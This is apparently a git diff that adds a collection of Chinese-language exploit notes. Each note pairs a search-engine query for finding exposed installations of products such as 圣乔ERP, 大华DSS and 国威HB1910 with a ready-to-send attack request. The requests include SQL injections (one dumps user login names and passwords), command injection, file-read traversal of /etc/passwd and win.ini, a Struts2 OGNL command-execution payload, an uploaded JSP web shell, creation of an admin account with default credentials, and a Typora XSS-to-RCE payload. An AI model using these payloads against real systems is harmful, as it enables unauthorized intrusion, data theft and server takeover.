+## 商混ERP系统接口TaskCarToQueue.aspx存在SQL注入漏洞
+
+商混ERP系统 TaskCarToQueue.aspx 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+title="商混ERP系统"
+```
+
+## poc
+```javascript
+GET /Dispatch/TaskCarToQueue.aspx?action=addqueue&id=%27WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+```
+
+![image-20240919110956450](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409191109679.png)
diff --git a/国威HB1910数字程控电话交换机generate.php未授权RCE漏洞.md b/国威HB1910数字程控电话交换机generate.php未授权RCE漏洞.md
new file mode 100644
index 0000000..74365af
--- /dev/null
+++ b/国威HB1910数字程控电话交换机generate.php未授权RCE漏洞.md
@@ -0,0 +1,23 @@
+# 国威HB1910数字程控电话交换机generate.php未授权RCE漏洞
+
+国威HB1910数字程控电话交换机 generate.php 接口存在远程命令执行漏洞，未经身份验证的恶意攻击者可以利用该漏洞远程执行任意命令，写入webshell后门文件，获取服务器权限。
+
+## fofa
+
+```javascript
+body="themes/tenant/css/login.css"
+```
+
+## fofa
+
+```javascript
+GET /modules/ping/generate.php?send=Ping&hostname=;id HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+```
+
+![image-20241219145844556](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412191458610.png)
\ No newline at end of file
diff --git a/圣乔ERP系统SingleRowQueryConvertor存在SQL注入漏洞.md b/圣乔ERP系统SingleRowQueryConvertor存在SQL注入漏洞.md
new file mode 100644
index 0000000..d835e88
--- /dev/null
+++ b/圣乔ERP系统SingleRowQueryConvertor存在SQL注入漏洞.md
@@ -0,0 +1,35 @@
+# 圣乔ERP系统SingleRowQueryConvertor存在SQL注入漏洞
+
+圣乔ERP系统 SingleRowQueryConvertor接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息
+
+## fofa
+
+```javascript
+title="圣乔ERP系统"
+```
+
+## poc
+
+```javascript
+POST /erp/dwr/call/plaincall/SingleRowQueryConvertor.queryForString.dwr HTTP/1.1
+Host: 
+Content-Type: text/plain
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Priority: u=0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+
+callCount=1
+page=/erp/dwr/test/SingleRowQueryConvertor
+httpSessionId=
+scriptSessionId=D528B0534A8BE018344AB2D54E02931D86
+c0-scriptName=SingleRowQueryConvertor
+c0-methodName=queryForString
+c0-id=0
+c0-param0=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (99=99) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(122)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)
+c0-param1=Array:[]
+batchId=0
+```
+
+![image-20241211210352012](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112103078.png)
\ No newline at end of file
diff --git a/圣乔ERP系统downloadFile.action任意文件读取漏洞.md b/圣乔ERP系统downloadFile.action任意文件读取漏洞.md
new file mode 100644
index 0000000..038294a
--- /dev/null
+++ b/圣乔ERP系统downloadFile.action任意文件读取漏洞.md
@@ -0,0 +1,20 @@
+# 圣乔ERP系统downloadFile.action任意文件读取漏洞
+
+圣乔ERP系统 downloadFile.action 存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件。
+
+## fofa
+```javascript
+app="圣乔-ERP系统"
+```
+
+## poc
+```javascript
+GET /erp/wap/../downloadFile.action?absolutePath=true&file=c:\\windows\win.ini HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![image-20241219152120711](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412191521762.png)
\ No newline at end of file
diff --git a/圣乔ERP系统getSupplyQueryKeyword存在SQL注入漏洞.md b/圣乔ERP系统getSupplyQueryKeyword存在SQL注入漏洞.md
new file mode 100644
index 0000000..c65196d
--- /dev/null
+++ b/圣乔ERP系统getSupplyQueryKeyword存在SQL注入漏洞.md
@@ -0,0 +1,33 @@
+# 圣乔ERP系统getSupplyQueryKeyword存在SQL注入漏洞
+
+圣乔ERP系统 getSupplyQueryKeyword接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息
+
+## fofa
+
+```javascript
+title="圣乔ERP系统"
+```
+
+## poc
+
+```javascript
+POST /erp/dwr/call/plaincall/DwrUtil.getSupplyQueryKeyword.dwr HTTP/1.1
+Host: 
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Priority: u=0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Content-Type: text/plain
+Accept-Encoding: gzip, deflate
+
+callCount=1
+page=/erp/dwr/test/DwrUtil
+httpSessionId=
+scriptSessionId=7D0BA25CD588C62EB9A08A089C7F368D561
+c0-scriptName=DwrUtil
+c0-methodName=getSupplyQueryKeyword
+c0-id=0
+c0-param0=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (99=99) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(122)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)
+batchId=9
+```
+
diff --git a/圣乔ERP系统login.action存在Struts2远程代码执行漏洞.md b/圣乔ERP系统login.action存在Struts2远程代码执行漏洞.md
new file mode 100644
index 0000000..57899ce
--- /dev/null
+++ b/圣乔ERP系统login.action存在Struts2远程代码执行漏洞.md
@@ -0,0 +1,27 @@
+# 圣乔ERP系统login.action存在Struts2远程代码执行漏洞
+
+圣乔ERP系统是杭州圣乔科技有限公司开发的一款企业级管理软件，旨在为企业提供一套全面、集成化的管理解决方案，帮助企业实现资源的优化配置和高效利用。该系统集成了财务、人力资源、生产、销售、供应链等多个业务模块，实现了企业内外部信息的无缝连接和实时共享。适用于各种规模的企业，特别是需要实现资源优化配置、提高运营效率和管理水平的企业。它可以帮助企业解决传统管理方式中存在的信息孤岛、数据重复输入、信息传递滞后等问题，提高企业的整体竞争力。由于圣乔ERP系统使用Struts2开发框架组件，存在历史Struts2远程代码执行漏洞，未经身份验证的远程攻击者可利用此漏洞执行任意系统命令，写入后门文件，获取服务器权限。
+
+## fofa
+
+```javascript
+title="圣乔ERP系统"
+```
+
+## poc
+
+```javascript
+POST /erp/login.action HTTP/1.1
+Host: 
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Priority: u=0, i
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Upgrade-Insecure-Requests: 1
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+
+redirect:%24%7B%23resp%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%27whoami%27%7D%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23dis%3Dnew+java.io.DataInputStream%28%23b%29%2C%23buf%3Dnew+byte%5B20000%5D%2C%23dis.read%28%23buf%29%2C%23msg%3Dnew+java.lang.String%28%23buf%29%2C%23dis.close%28%29%2C%23resp.getWriter%28%29.println%28%23msg.trim%28%29%29%2C%23resp.getWriter%28%29.flush%28%29%2C%23resp.getWriter%28%29.close%28%29%7D
+```
+
+![image-20241128093556493](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280935554.png)
\ No newline at end of file
diff --git a/圣乔ERP系统queryForMapWithDefaultValues存在SQL注入漏洞.md b/圣乔ERP系统queryForMapWithDefaultValues存在SQL注入漏洞.md
new file mode 100644
index 0000000..67d8fe0
--- /dev/null
+++ b/圣乔ERP系统queryForMapWithDefaultValues存在SQL注入漏洞.md
@@ -0,0 +1,34 @@
+# 圣乔ERP系统queryForMapWithDefaultValues存在SQL注入漏洞
+
+圣乔ERP系统 queryForMapWithDefaultValues接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息
+
+## fofa
+
+```javascript
+title="圣乔ERP系统"
+```
+
+## poc
+
+```javascript
+POST /erp/dwr/call/plaincall/ResultSetConvertor.queryForMapWithDefaultValues.dwr HTTP/1.1
+Host: 
+Content-Type: text/plain
+Priority: u=0
+Accept-Encoding: gzip, deflate
+Accept: */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+
+callCount=1
+page=/erp/dwr/test/ResultSetConvertor
+httpSessionId=
+scriptSessionId=B4C02555EA992FF3A73F3CCA60389809871
+c0-scriptName=ResultSetConvertor
+c0-methodName=queryForMapWithDefaultValues
+c0-id=0
+c0-param0=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (99=99) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(122)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)
+c0-param1=Array:[]
+batchId=4
+```
+
diff --git a/圣乔ERP系统queryForString存在SQL注入漏洞.md b/圣乔ERP系统queryForString存在SQL注入漏洞.md
new file mode 100644
index 0000000..9c204a9
--- /dev/null
+++ b/圣乔ERP系统queryForString存在SQL注入漏洞.md
@@ -0,0 +1,35 @@
+# 圣乔ERP系统queryForString存在SQL注入漏洞
+
+圣乔ERP系统 queryForString 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息
+
+## fofa
+
+```javascript
+title="圣乔ERP系统"
+```
+
+## poc
+
+```javascript
+POST /erp/dwr/call/plaincall/NamedParameterSingleRowQueryConvertor.queryForString.dwr HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Content-Type: application/x-www-form-urlencoded; charset=utf-8
+Connection: close
+
+c0-id=0
+batchId=0
+callCount=1
+c0-param1=Object_Object:{}
+page=/erp/dwr/test/NamedParameterSingleRowQueryConvertor
+httpSessionId=47CA299619667847F1BB450454E6C2D4
+scriptSessionId=F3F037EB7A5102043AD4CEB47EB17A7275
+c0-scriptName=NamedParameterSingleRowQueryConvertor
+c0-methodName=queryForString
+c0-param0=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (99=99) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(122)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)
+```
+
+![image-20241211210001578](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112100655.png)
\ No newline at end of file
diff --git a/圣乔ERP系统uploadFile文件上传漏洞.md b/圣乔ERP系统uploadFile文件上传漏洞.md
new file mode 100644
index 0000000..8792791
--- /dev/null
+++ b/圣乔ERP系统uploadFile文件上传漏洞.md
@@ -0,0 +1,33 @@
+# 圣乔ERP系统uploadFile文件上传漏洞
+
+圣乔ERP系统 uploadFile.action 接口存在文件上传漏洞，未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
+
+## fofa
+
+```javascript
+title="圣乔ERP系统"
+```
+
+## poc
+
+```javascript
+POST /erp/wap/../uploadFile.action HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
+Content-Type: multipart/form-data boundary=----WebKitFormBoundaryssh7UfnPpGU7BXfK
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip
+Connection: close
+
+------WebKitFormBoundaryssh7UfnPpGU7BXfK
+Content-Disposition: form-data; name="Filedata"; filename="rce.jsp"
+Content-Type: image/png
+
+<% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b,0,a));}out.print("</pre>");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
+------WebKitFormBoundaryssh7UfnPpGU7BXfK--
+```
+
+![image-20241211210137494](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112101562.png)
+
+文件路径:`/erp/wap/../FileStorageDirectorynull/rce.jsp?cmd=whoami`
\ No newline at end of file
diff --git a/圣乔ERP系统存在struts2远程命令执行漏洞.md b/圣乔ERP系统存在struts2远程命令执行漏洞.md
new file mode 100644
index 0000000..6d3688c
--- /dev/null
+++ b/圣乔ERP系统存在struts2远程命令执行漏洞.md
@@ -0,0 +1,32 @@
+# 圣乔ERP系统存在struts2远程命令执行漏洞
+
+# 一、漏洞简介
+杭州圣乔科技有限公司成立于2007年02月27日，注册地位于浙江省杭州市拱墅区和睦路555号201幢116室，法定代表人为张鹏。经营范围包括计算机软硬件、电子产品的技术开发、销售。圣乔ERP系统存在struts2远程命令执行漏洞
+
+# 二、影响版本
++ 圣乔ERP系统
+
+# 三、资产测绘
++ hunter`web.icon="d2c808114296ddd9e76e9c774d79bd43"`
++ fofa`app="圣乔-ERP系统"`
++ 特征
+
+![1730869080978-12b99405-c009-4ad9-859b-18e58e139dc8.png](./img/iQrJOGDYU3xmx0IV/1730869080978-12b99405-c009-4ad9-859b-18e58e139dc8-963827.png)
+
+# 四、漏洞复现
+```java
+/shengfeng/login.action
+```
+
+![1730869093319-2c1db21f-5781-4e14-a1a5-03075a51a6ee.png](./img/iQrJOGDYU3xmx0IV/1730869093319-2c1db21f-5781-4e14-a1a5-03075a51a6ee-323929.png)
+
+```plain
+/erp/login.action
+```
+
+![1730905698826-0bcf624e-28b5-4c23-ba75-3bd4e21a4cdd.png](./img/iQrJOGDYU3xmx0IV/1730905698826-0bcf624e-28b5-4c23-ba75-3bd4e21a4cdd-226170.png)
+
+
+
+> 更新: 2024-11-27 10:00:07  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ht9nkwf0kxowxnhw>
\ No newline at end of file
diff --git a/地大信息-基础信息平台GetImg任意文件读取漏洞.md b/地大信息-基础信息平台GetImg任意文件读取漏洞.md
new file mode 100644
index 0000000..65e2b2a
--- /dev/null
+++ b/地大信息-基础信息平台GetImg任意文件读取漏洞.md
@@ -0,0 +1,20 @@
+# 地大信息-基础信息平台GetImg任意文件读取漏洞
+
+地大信息-基础信息平台 GetImg 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取文件、数据库配置文件等等。
+
+## fofa
+
+```javascript
+body="/SystemManage/BaseProject" || title=="基础信息平台"
+```
+
+## poc
+
+```javascript
+GET /SystemManage/BaseProject/GetImg?path=C:\windows\win.ini HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Connection: close
+```
+
+![image-20240918135731789](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409181357847.png)
\ No newline at end of file
diff --git a/基于Typora-DOM的跨站点脚本导致远程代码执行(CVE-2023-2317).md b/基于Typora-DOM的跨站点脚本导致远程代码执行(CVE-2023-2317).md
new file mode 100644
index 0000000..1944768
--- /dev/null
+++ b/基于Typora-DOM的跨站点脚本导致远程代码执行(CVE-2023-2317).md
@@ -0,0 +1,13 @@
+
+# 基于Typora DOM的跨站点脚本导致远程代码执行（CVE-2023-2317）
+
+## 漏洞简介
+
+Windows和Linux版本1.6.7之前的Typora中updater/update.html中基于DOM的XSS允许特制的markdown文件通过加载在Typora主窗口的上下文中运行任意JavaScript代码`typora://app/typemark/updater/update.html`在＜embed＞标记中。如果用户在Typora中打开恶意降价文件，或者从恶意网页复制文本并将其粘贴到Typora，则可以利用此漏洞。
+
+```html
+<embed src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ'))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]"></embed>
+```
+
+## 漏洞复现
+https://mp.weixin.qq.com/s/Jssc5eW7FVcyWPL9IVHr9g
diff --git a/多客圈子论坛系统httpGet存在任意文件读取漏洞.md b/多客圈子论坛系统httpGet存在任意文件读取漏洞.md
new file mode 100644
index 0000000..8d95e13
--- /dev/null
+++ b/多客圈子论坛系统httpGet存在任意文件读取漏洞.md
@@ -0,0 +1,31 @@
+# 多客圈子论坛系统httpGet存在任意文件读取漏洞
+
+# 一、漏洞简介
+多客圈子论坛系统是一种在线社区平台，旨在为用户提供一个共享知识、经验和想法的空间。社交圈子论坛系统除了提供基本的社交功能外，还可以根据用户行为和兴趣为用户推荐相关内容。 多客圈子论坛系统 httpGet接口处存在任意文件读取漏洞，恶意攻击者可能利用该漏洞读取服务器上的敏感文件，例如客户记录、财务数据或源代码，导致数据泄露。 
+
+# 二、影响版本
++ 多客圈子论坛系统
+
+# 三、资产测绘
+```plain
+body="/static/index/js/jweixin-1.2.0.js"
+```
+
+![1718072652587-1ddcb3fb-c3f2-46eb-a86c-0cfe7e1e8eb5.png](./img/LMSv_axjAY4hGuYk/1718072652587-1ddcb3fb-c3f2-46eb-a86c-0cfe7e1e8eb5-274680.png)
+
+# 四、漏洞复现
+```http
+GET /index.php/api/login/httpGet?url=file:///etc/passwd HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+```
+
+![1718072728134-f5bfd022-8381-475a-8997-199ef1af84da.png](./img/LMSv_axjAY4hGuYk/1718072728134-f5bfd022-8381-475a-8997-199ef1af84da-138441.png)
+
+
+
+> 更新: 2024-06-17 09:34:03  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gv2apt8f7pypg1nt>
\ No newline at end of file
diff --git a/夜莺开源监控系统存在默认用户漏洞.md b/夜莺开源监控系统存在默认用户漏洞.md
new file mode 100644
index 0000000..ca66d63
--- /dev/null
+++ b/夜莺开源监控系统存在默认用户漏洞.md
@@ -0,0 +1,34 @@
+# 夜莺开源监控系统存在默认用户漏洞
+
+夜莺开源监控系统存在默认用户漏洞，/v1/n9e/接口401鉴权存在默认用户
+## fofa
+```javascript
+icon_hash="-2047686847"
+```
+
+## hunter
+```javascript
+web.body="icon-yijigaojing"
+```
+
+## poc
+
+```javascript
+GET /v1/n9e/users HTTP/1.1
+Host: monitor.xxxx.com
+Cache-Control: max-age=0
+Authorization: Basic dXNlcjAwMTpjY2MyNmRhN2I5YWJhNTMzY2JiMjYzYTM2YzA3ZGNjNQ==
+```
+
+```
+POST /v1/n9e/users HTTP/1.1
+Host: 
+Cache-Control: max-age=0
+Authorization: Basic dXNlcjAwMTpjY2MyNmRhN2I5YWJhNTMzY2JiMjYzYTM2YzA3ZGNjNQ==
+Content-Type: application/json
+Content-Length: 61
+
+{"Username":"test","Password":"test","Roles":["Admin"]}
+```
+
+![image-20241018164816652](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410181648722.png)
\ No newline at end of file
diff --git a/大为计算机软件开发有限公司知识产权协同创新管理系统任意密码重置.md b/大为计算机软件开发有限公司知识产权协同创新管理系统任意密码重置.md
new file mode 100644
index 0000000..268de16
--- /dev/null
+++ b/大为计算机软件开发有限公司知识产权协同创新管理系统任意密码重置.md
@@ -0,0 +1,25 @@
+# 大为计算机软件开发有限公司知识产权协同创新管理系统任意密码重置
+
+# 一、漏洞简介
+大为计算机软件开发有限公司知识产权协同创新管理系统存在任意密码重置漏洞
+
+# 二、影响版本
++ 大为计算机软件开发有限公司知识产权协同创新管理系统
+
+# 三、资产测绘
++ hunter`web.body="大为计算机软件开发有限公司"`
++ 特征
+
+![1698767180872-69f83182-733b-43aa-a0c6-32a65e6b9fc9.png](./img/_6NIYiUWOeUtuWby/1698767180872-69f83182-733b-43aa-a0c6-32a65e6b9fc9-204217.png)
+
+# 四、漏洞复现
+```plain
+/resetPwd.html?guid=IWBI9HveWf01GlDm+je0Ec+qvHyI7F5bjy3kRC2uESwC0+KPmTxUsgHqj+lUuY0F061yruzA+jkZFb9hhNqPhw%3D%3D
+```
+
+![1698767201134-b65db187-0983-47ba-a3f0-ad7bac489060.png](./img/_6NIYiUWOeUtuWby/1698767201134-b65db187-0983-47ba-a3f0-ad7bac489060-985558.png)
+
+
+
+> 更新: 2024-02-29 23:55:47  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rmi9xpgr32bsz4aq>
\ No newline at end of file
diff --git a/大华DSS-itcBulletin-SQL-注入漏洞.md b/大华DSS-itcBulletin-SQL-注入漏洞.md
new file mode 100644
index 0000000..33e11de
--- /dev/null
+++ b/大华DSS-itcBulletin-SQL-注入漏洞.md
@@ -0,0 +1,80 @@
+## 大华DSS itcBulletin SQL 注入漏洞
+大华DSS数字监控系统itcBulletin接口存在SQL注入漏洞，攻击者可以利用该漏洞获取数据库敏感信息。
+
+## fofa
+```
+app="dahua-DSS"
+```
+
+## poc
+```
+POST /portal/services/itcBulletin?wsdl HTTP/1.1
+Host: x.x.x.x
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Connection: close
+Content-Length: 345
+Accept-Encoding: gzip
+
+<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
+  <s11:Body>
+    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
+      <netMarkings>
+        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
+      </netMarkings>
+    </ns1:deleteBulletin>
+  </s11:Body>
+</s11:Envelope>
+
+
+POST /portal/services/itcBulletin?wsdl HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Accept-Encoding: gzip
+ 
+<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
+  <s11:Body>
+    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
+      <netMarkings>
+        (updatexml(1,concat(0x7e,(select substr(group_concat(login_name, " ",login_pass),1,30) from sys_user),0x7e),1))) and (1=1
+      </netMarkings>
+    </ns1:deleteBulletin>
+  </s11:Body>
+</s11:Envelope>
+
+```
+
+## nuclei poc
+```
+id: dahua-dss-itcBulletin-sqli
+info:
+  name: 大华DSS itcBulletin SQL注入漏洞
+  author: fgz
+  severity: high
+  description: 大华DSS数字监控系统itcBulletin接口存在SQL注入漏洞，攻击者可以利用该漏洞获取数据库敏感信息。
+  metadata:
+    fofa-query: app="dahua-DSS"
+
+requests:
+  - raw:
+      - |+
+        POST /portal/services/itcBulletin?wsdl HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: gzip
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+        
+        <s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
+          <s11:Body>
+            <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
+              <netMarkings>
+                (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
+              </netMarkings>
+            </ns1:deleteBulletin>
+          </s11:Body>
+        </s11:Envelope>
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code==500 && contains(body,"error code [1105]") && contains(body,"6cfe798ba8e5b85feb50164c59f4bec")'
+```
diff --git a/大华DSS数字监控系统attachment_downloadAtt.action任意文件读取漏洞.md b/大华DSS数字监控系统attachment_downloadAtt.action任意文件读取漏洞.md
new file mode 100644
index 0000000..db3a3c3
--- /dev/null
+++ b/大华DSS数字监控系统attachment_downloadAtt.action任意文件读取漏洞.md
@@ -0,0 +1,23 @@
+# 大华DSS数字监控系统attachment_downloadAtt.action任意文件读取漏洞
+
+大华DSS数字监控系统 attachment_downloadByUrlAtt.action接口存在任意文件读取漏洞，未经身份验证的远程攻击者 可以利用此漏洞获取系统内部敏感文件信息，使系统处于极不安全的状态。
+
+## fofa
+
+```java
+app="dahua-DSS"
+```
+
+## poc
+
+```javascript
+GET /portal/attachment_downloadAtt.action?filePath=../../../../../../etc/passwd HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+![image-20241211211500395](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112115457.png)
\ No newline at end of file
diff --git a/大华DSS视频管理系统attachment_clearTempFile存在SQL注入漏洞.md b/大华DSS视频管理系统attachment_clearTempFile存在SQL注入漏洞.md
new file mode 100644
index 0000000..b5c5f28
--- /dev/null
+++ b/大华DSS视频管理系统attachment_clearTempFile存在SQL注入漏洞.md
@@ -0,0 +1,32 @@
+# 大华 DSS 视频管理系统attachment_clearTempFile存在SQL注入漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(0, 0, 0);">大华DSS城市安防监控平台是一个在通用安防视频监控系统基础上设计开发的系统。大华DSS城市安防监控平台attachment_clearTempFile文件存在SQL注入漏洞，攻击者可以通过此漏洞获取数据库权限。</font>
+
+# 二、影响版本
++ 大华 DSS 视频管理系统
+
+# 三、资产测绘
++ hunter：`app.name=="Dahua 大华 DSS 视频管理系统"`
+
+![1691867182224-1219c86f-cf8f-45b6-a1cf-8161c98567cc.png](./img/8ALRMRupTeWfQbmC/1691867182224-1219c86f-cf8f-45b6-a1cf-8161c98567cc-419113.png)
+
++ 登录页面
+
+![1691867201317-4728fc1e-bdf3-485b-a82a-67995f73e590.png](./img/8ALRMRupTeWfQbmC/1691867201317-4728fc1e-bdf3-485b-a82a-67995f73e590-437522.png)
+
+# 四、漏洞复现
+```java
+GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,md5(1),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Accept-Encoding: gzip
+Connection: close
+```
+
+![1714291586245-19c2c45a-f9d8-4c77-af35-4f000ae2956c.png](./img/8ALRMRupTeWfQbmC/1714291586245-19c2c45a-f9d8-4c77-af35-4f000ae2956c-415198.png)
+
+
+
+> 更新: 2024-04-28 16:06:59  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bz9pqrmrb068vt05>
\ No newline at end of file
